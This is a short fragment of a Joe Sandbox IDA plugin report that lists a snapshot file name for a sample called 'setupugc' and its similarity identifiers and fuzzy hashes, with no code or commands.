                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID:
                          • String ID: $$@
                          • API String ID: 0-1194432280
                          • Opcode ID: 86c1f99f116718411e33d85c0003f0068913d228b86b9bae4e9a19426816fbc8
                          • Instruction ID: 62410d381c727ea0943dc8e70ffa2ce102f8e41d8851e62ddde045b96e27b878
                          • Opcode Fuzzy Hash: 86c1f99f116718411e33d85c0003f0068913d228b86b9bae4e9a19426816fbc8
                          • Instruction Fuzzy Hash: 8E813C75D012699FDB21DF94CC44BEAB7B8AB48750F0445EAEA19BB280D7305E84CFA0